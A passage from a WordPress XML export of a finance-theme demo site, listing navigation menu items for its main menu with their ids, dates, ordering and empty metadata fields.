		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2107/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2107/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2107</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2107]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>29</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[455]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2108/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2108/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2108</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2108]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>9</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[624]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2109/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2109/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2109</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2109]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>11</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[566]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2110/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2110/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2110</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2110]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>6</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[529]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2111/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2111/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2111</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2111]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>7</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[690]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2112/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2112/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2112</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2112]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>8</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[711]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2113/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2113/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2113</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2113]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>10</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[471]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2114/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2114/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2114</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2114]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>26</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2115/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2115/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2115</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2115]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>25</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2122]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1002]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2116/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2116/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2116</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2116]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>24</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2122]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[999]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2117/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2117/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2117</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2117]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>23</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2122]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[996]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2118/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2118/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
